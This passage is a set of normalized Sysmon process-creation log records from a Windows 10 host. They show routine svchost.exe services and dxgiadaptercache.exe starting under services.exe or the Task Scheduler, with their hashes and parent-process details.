"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:26.6438375Z\"},\"EventRecordID\":\"27537\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:17.546\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b765-5ea4-0000-001031250100}\"},{\"Name\":\"ProcessId\",\"text\":\"1920\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT 
AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "C:\\Windows\\System32\\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b765-5ea4-0000-001031250100", 
"object.process.hash.imphash": "247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "1920", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.504Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:17.546Z", "type": "raw", "uuid": "97d92ca4-c4ef-4894-aba9-8146d64131a7"}
+{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:26.6420355Z\"},\"EventRecordID\":\"27535\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:17.543\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b765-5ea4-0000-00109b240100}\"},{\"Name\":\"ProcessId\",\"text\":\"1912\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k LocalService -p -s FontCache\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\LOCAL 
SERVICE\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e5030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e5\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e5030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:local service@nt authority", "object.account.name": "local service", "object.account.privileges": "System", "object.account.session_id": "997", "object.process.cmdline": "C:\\Windows\\system32\\svchost.exe -k LocalService -p -s FontCache", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b765-5ea4-0000-00109b240100", 
"object.process.hash.imphash": "247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "1912", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.504Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:local service@nt authority", "subject.account.name": "local service", "subject.account.privileges": "System", "subject.account.session_id": "997", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:17.543Z", "type": "raw", "uuid": "b4f762b5-ddd6-4873-a4f2-e6b3aa738386"}
+{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:26.6352814Z\"},\"EventRecordID\":\"27528\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:17.513\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b765-5ea4-0000-0010831f0100}\"},{\"Name\":\"ProcessId\",\"text\":\"1876\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\dxgiadaptercache.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"DXGI Adapter Cache\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"DXGIAdapterCache.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\dxgiadaptercache.exe\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT 
AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=898AD000DF8317837B5CF97FA32509739346EDDB,MD5=CEA17E28EFF3B2EED6B49B5DDCC7327F,SHA256=BA598EFD9D9C4449DEAC83F78CEC893AA127F31767902D6DD69A157B65450240,IMPHASH=88A45A1AD2822D23AF808E0A0C8194B7\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0010a5d20000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"1104\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Schedule\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "C:\\Windows\\system32\\dxgiadaptercache.exe", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\dxgiadaptercache.exe", "object.process.guid": "747f3d96-b765-5ea4-0000-0010831f0100", 
"object.process.hash.imphash": "88A45A1AD2822D23AF808E0A0C8194B7", "object.process.hash.md5": "CEA17E28EFF3B2EED6B49B5DDCC7327F", "object.process.hash.sha1": "898AD000DF8317837B5CF97FA32509739346EDDB", "object.process.hash.sha256": "BA598EFD9D9C4449DEAC83F78CEC893AA127F31767902D6DD69A157B65450240", "object.process.id": "1876", "object.process.meta": "Description:DXGI Adapter Cache | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "dxgiadaptercache.exe", "object.process.original_name": "DXGIAdapterCache.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule", "object.process.parent.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-0010a5d20000", "object.process.parent.id": "1104", "object.process.parent.name": "svchost.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.504Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:17.513Z", "type": "raw", "uuid": "ad832f04-aefb-46bd-a850-e5c12410e8e6"}
+{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:26.6326837Z\"},\"EventRecordID\":\"27524\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:17.476\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b765-5ea4-0000-001028190100}\"},{\"Name\":\"ProcessId\",\"text\":\"1780\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s SENS\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT 
AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s SENS", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b765-5ea4-0000-001028190100", "object.process.hash.imphash": 
"247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "1780", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.504Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:17.476Z", "type": "raw", "uuid": "e13c80d2-c883-45aa-b3e8-1894a5277acd"}
+{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:26.5580910Z\"},\"EventRecordID\":\"27506\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:17.430\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b765-5ea4-0000-00102b0f0100}\"},{\"Name\":\"ProcessId\",\"text\":\"1676\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe -k LocalService -p -s netprofm\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\LOCAL 
SERVICE\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e5030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e5\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e5030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:local service@nt authority", "object.account.name": "local service", "object.account.privileges": "System", "object.account.session_id": "997", "object.process.cmdline": "C:\\Windows\\System32\\svchost.exe -k LocalService -p -s netprofm", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b765-5ea4-0000-00102b0f0100", "object.process.hash.imphash": 
"247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "1676", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.504Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:local service@nt authority", "subject.account.name": "local service", "subject.account.privileges": "System", "subject.account.session_id": "997", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:17.430Z", "type": "raw", "uuid": "bdc02f7b-8b53-4f06-9f6f-709763f9c3ae"}
+{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:26.5421094Z\"},\"EventRecordID\":\"27502\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:17.402\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b765-5ea4-0000-0010ea0a0100}\"},{\"Name\":\"ProcessId\",\"text\":\"1640\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe -k netsvcs -p -s Themes\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT 
AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", 